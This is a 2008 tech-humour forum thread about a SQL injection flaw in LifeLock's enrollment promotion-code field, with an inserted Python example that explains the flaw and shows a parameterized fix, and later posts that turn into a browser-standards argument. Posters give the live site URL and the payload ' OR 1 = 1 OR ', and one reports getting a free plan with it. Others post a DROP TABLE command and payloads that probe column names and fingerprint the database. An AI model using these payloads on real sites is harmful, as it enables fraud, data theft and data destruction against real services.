The Daily WTF: Curious Perversions in Information Technology

Lifelock

Last post 05-27-2008 7:39 AM by belgariontheking. 51 replies.
  • 05-22-2008 3:07 PM

    Lifelock

    No, this isn't a post about Lifelock's CEO (the one who has advertisements with his SSN in them) having his identity stolen.

    Go to the LifeLock enrollment site: https://secure.lifelock.com/enrollmentform.aspx

    For the promotion code, use

    ' OR 1 = 1 OR '

    (with quotes).

    Hilarity ensues.

  • 05-22-2008 3:09 PM In reply to

    Re: Lifelock

    Wow, you mean I get a completely worthless product for FREE??

     

    Also, nice job with the link there.  I enjoy having to copy-and-paste text like this is some copy-and-paste sweatshop.  Jerk. 

    Tired of incompetent moderation?
    Wondering where all the clever discussion went?
    Try irc.slashnet.org #TDWTFMafia.
    We don't ban or kick and everyone is welcome.*

    *Stupid people will be mocked mercilessly and encouraged to commit suicide, however.
  • 05-22-2008 3:11 PM In reply to

    Re: Lifelock

    Colin McGuigan:
    Hilarity ensues.
    I wouldn't exactly call that "hilarity", but it is a WTF. The thing is, who's gonna go all the way with this and see if someone manually reviews it at the end?

    Join us at #TDWTF on irc.slashnet.org !

  • 05-22-2008 3:24 PM In reply to

    Re: Lifelock

    AbbydonKrafts:
    I wouldn't exactly call that "hilarity", but it is a WTF. The thing is, who's gonna go all the way with this and see if someone manually reviews it at the end?
     

    I don't think that a manual review could spot this at all. The site seems to be selecting all existing discounts that match the promo code, then using the cheapest one. Adding the SQL snippet is making the SELECT statement return all rows in this table, of which then the row with the smallest cost is selected. This happens to be a complimentary account, which is obviously free.

    From that point forward the actual values from the database row are used, and any review will look like the appropriate code was entered.
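
Added example, not part of the thread and not LifeLock's code: the lookup behaviour described in the post above, rebuilt in Python with sqlite3 so the concatenated query can be compared with a parameterized one. The `promotions` table, its columns and the sample rows are constructed assumptions; the real schema is not known from this page.

```python
import sqlite3

# Constructed sample data; table and column names are assumptions.
ROWS = [
    ("SAVE10", "Ten dollars off", 9.00),
    ("RADIO5", "Radio offer", 7.50),
    ("STAFF-COMP", "Comp Plan", 0.00),
]
PAGE_INPUT = "' OR 1 = 1 OR '"  # promotion code quoted in the first post


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE promotions (code TEXT, name TEXT, monthly_cost REAL)")
    db.executemany("INSERT INTO promotions VALUES (?, ?, ?)", ROWS)
    return db


def lookup_concatenated(db, promo_code):
    """Flawed pattern: the user's input becomes part of the SQL text."""
    sql = ("SELECT name, monthly_cost FROM promotions WHERE code = '"
           + promo_code + "' ORDER BY monthly_cost LIMIT 1")
    return db.execute(sql).fetchone()


def lookup_parameterized(db, promo_code):
    """Hardened pattern: the input is bound as a value, never parsed as SQL."""
    rows = db.execute(
        "SELECT name, monthly_cost FROM promotions WHERE code = ?",
        (promo_code,),
    ).fetchall()
    # A promo code identifies exactly one promotion; anything else is rejected
    # instead of silently picking the cheapest row.
    return rows[0] if len(rows) == 1 else None


if __name__ == "__main__":
    db = make_db()
    # The WHERE clause is true for every row, so the cheapest plan is chosen.
    print(lookup_concatenated(db, PAGE_INPUT))
    # The same input is compared as a literal string and matches nothing.
    print(lookup_parameterized(db, PAGE_INPUT))
    # A legitimate code still resolves to its own row.
    print(lookup_parameterized(db, "SAVE10"))
```

Because the stored row is what gets written to the order, an audit of the order record alone cannot distinguish the two cases; logging the raw promotion code as submitted is what makes the difference visible.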

  • 05-22-2008 3:30 PM In reply to

    Re: Lifelock

    How do they want to protect me if they can't protect themselves!?

    I also like 'Hacker Safe' banner on the main page (bottom right) :D

  • 05-22-2008 3:31 PM In reply to

    Re: Lifelock

    Nandurius:
    From that point forward the actual values from the database row are used, and any review will look like the appropriate code was entered.
    The code isn't the problem as far as being the OR statement. I meant if they have some kind of review that would reveal that the applicant shouldn't have had access to the promotion at all. I'd imagine that a completely free account would probably even trigger a thorough manual review.


  • 05-22-2008 3:43 PM In reply to

    • XioPod
    • Not Ranked
    • Joined on 05-22-2008
    • Posts 2

    Re: Lifelock

    LOL!! it worked, i just signed up and got an e-mail from them:
    Dear XioPod, Thank you for enrolling with LifeLock®. You are the primary contact for the XioPod Family. You have elected the following payment option: Comp Plan, which includes a recurring payment of $ 0.00. This amount will be automatically charged to your credit card each month or year, depending on your payment option. Your Invoice Number is: [omitted] To contact us, please do not reply to this email. If you have any questions, please send a separate email to member.services@lifelock.com or give us a call at 1-877-543-3562 and select option 2. We are available 24/7. Thank you for your membership. Sincerely, LifeLock Member Services
    awesomeness
  • 05-22-2008 3:52 PM In reply to

    Re: Lifelock

    LOL, I can't believe you just tried that. wtg! Promo code: ' OR 1=1; DROP TABLE Customers --
  • 05-22-2008 4:01 PM In reply to

    Re: Lifelock

    morbiuswilters:
    Also, nice job with the link there.  I enjoy having to copy-and-paste text like this is some copy-and-paste sweatshop.  Jerk. 

    In all fairness to the OP, I've had the same problem.  I think there's some sort of WTF with this forum software.  Sometimes when I put a link in a post it comes out fine and sometimes it doesn't, even though I don't do anything differently.

     

     

  • 05-22-2008 4:04 PM In reply to

    Re: Lifelock

    El_Heffe:
    Sometimes when I put a link in a post it comes out fine and sometimes it doesn't
    Lies! Plain-text editor does not fail.


  • 05-22-2008 4:09 PM In reply to

    Re: Lifelock

    El_Heffe:
    I think there's some sort of WTF with this forum software. 
     

    Funny, I have used IE7, FF3 (B1-5,RC1) and Safari on this forum and I have never seen the behavior you suggest.

    Yes, I have been banned. Thanks to all for a good time.

  • 05-22-2008 4:12 PM In reply to

    Re: Lifelock

    XioPod:
    LOL!! it worked, i just signed up and got an e-mail from them:
    This amount will be automatically charged to your credit card each month or year, depending on your payment option.

     You didn't use your real card details did you? You really should bill free stuff to a test (Visa) card number like 4111 1111 1111 1111 ...

    Fixing bugs in a VB program is like playing whack-a-mole.
  • 05-22-2008 4:12 PM In reply to

    Re: Lifelock

    MasterPlanSoftware:

    El_Heffe:
    I think there's some sort of WTF with this forum software. 
     

    Funny, I have used IE7, FF3 (B1-5,RC1) and Safari on this forum and I have never seen the behavior you suggest.

    What, no Opera?

  • 05-22-2008 4:20 PM In reply to

    Re: Lifelock

    bstorer:
    What, no Opera?
     

    Nope, get a real browser.

  • 05-22-2008 4:36 PM In reply to

    Re: Lifelock

    ' or [SomeColumnName] <> 1 or '

    Error if column doesn't exist, success if column does exist. If we figure out table names, we can union to select more data.

    [Name] is a valid column.

  • 05-22-2008 4:42 PM In reply to

    Re: Lifelock

    MasterPlanSoftware:

    bstorer:
    What, no Opera?

    Nope, get a real browser.


    ...
    MasterPlanSoftware:
    I have used IE7
    Wtf?
  • 05-22-2008 4:43 PM In reply to

    Re: Lifelock

    ' OR Name like 'a%'-- or '

    Produces a comp account.

    ' OR Name like 'b%'-- or '

    Does not.

  • 05-22-2008 4:56 PM In reply to

    Re: Lifelock

    joe.edwards:
    ' or [SomeColumnName] <> 1 or '

    Error if column doesn't exist, success if column does exist. If we figure out table names, we can union to select more data.

    [Name] is a valid column.

    Kind of pointless though, can't see any way to get information out unless you can somehow insert a dynamic select and override the promotion description ("You save $10.00!") or whatever. Tricky without knowing the schema exactly.

  • 05-22-2008 5:09 PM In reply to

    Re: Lifelock

    VisualD:

    MasterPlanSoftware:
    I have used IE7
    Wtf?
     

    Do you not understand what I said? Do you not know what IE7 is?

  • 05-22-2008 5:11 PM In reply to

    • dlikhten
    • Top 25 Contributor
    • Joined on 09-27-2007
    • New York Citeyah
    • Posts 668

    Re: Lifelock

     Step 1 is to figure out what db type it is... It could be oracle ' OR GREATEST(1,2) = 1 OR ' works.

    Code is like a box of chocolates. You never know who stuck a turd in there and why.
    The Stupidest Man On Earth
    SSDS Bug: Program should not start up
  • 05-22-2008 5:49 PM In reply to

    Re: Lifelock

    MasterPlanSoftware:

    Do you not understand what I said? Do you not know what IE7 is?

    Not a real browser? As in, actually far enough from the standards that it's not funny (yes I know it's better than 6, doesn't exactly say much). To claim Opera is not a real browser when you're implying IE7 is, is to me, somewhat laughable. As a web developer, Opera, FF and Safari display my valid xhtml / css / javascript almost identically, whereas IE(Whatever, maybe not 8) is invariably well out of kilter. A "Proper" browser to me would suggest one that actually follows international standards, like actually implementing that little known "css" thing properly, maybe even with a box model that actually makes sense.

    Thought it was pretty obvious really. I shall endeavor to be more verbose in future to aid in your comprehension.

  • 05-22-2008 5:58 PM In reply to

    Re: Lifelock

    VisualD:
    As a web developer
     

    Well there goes that credibility.... 

    If you think IE7 is the problem, then you don't understand the issue. Don't talk to me about standards.

  • 05-22-2008 6:03 PM In reply to

    Re: Lifelock

    VisualD:

    Not a real browser? As in, actually far enough from the standards that it's not funny (yes I know it's better than 6, doesn't exactly say much). To claim Opera is not a real browser when you're implying IE7 is, is to me, somewhat laughable. As a web developer, Opera, FF and Safari display my valid xhtml / css / javascript almost identically, whereas IE(Whatever, maybe not 8) is invariably well out of kilter. A "Proper" browser to me would suggest one that actually follows international standards, like actually implementing that little known "css" thing properly, maybe even with a box model that actually makes sense.

    Thought it was pretty obvious really. I shall endeavor to be more verbose in future to aid in your comprehension.

    If you are writing pages in XHTML you are almost certainly serving up broken HTML.  Way to follow the standards there.  Also, all of the browsers have flaws.  IE has the largest install base so it is a de facto standard and if I had to choose only one browser to support, it would definitely be IE.  People who endlessly appeal to "the standards" without realizing most standards are hopelessly flawed and no software follows them properly annoy the hell out of me.  Seriously, get over it and write the goddamn code.  This is what we are paid for.  If it was so easy any idiot could do it then most of us wouldn't have jobs.  Also, Opera sucks and needs to die.  It's bad enough we have 3 mediocre browsers (IE, FF and Safari) but there is no reason for Opera to exist.

  • 05-22-2008 6:11 PM In reply to

    Re: Lifelock

    morbiuswilters:
    endlessly appeal to "the standards" without realizing most standards are hopelessly flawed
     

    And I am sure that VisualD can sit down and read through the standards and write a perfect working browser too...

    What these /. rejects need to realize is IE sets the standard. Whoever has the most market share? Standard. Plain and simple. Cry about it all you want, but that is the way it works.

  • 05-22-2008 6:21 PM In reply to

    Re: Lifelock

    MasterPlanSoftware:
    Whoever has the most market share? Standard.

    In that case, IE needs to support my <blink> tags, because Netscape Navigator used to be the standard!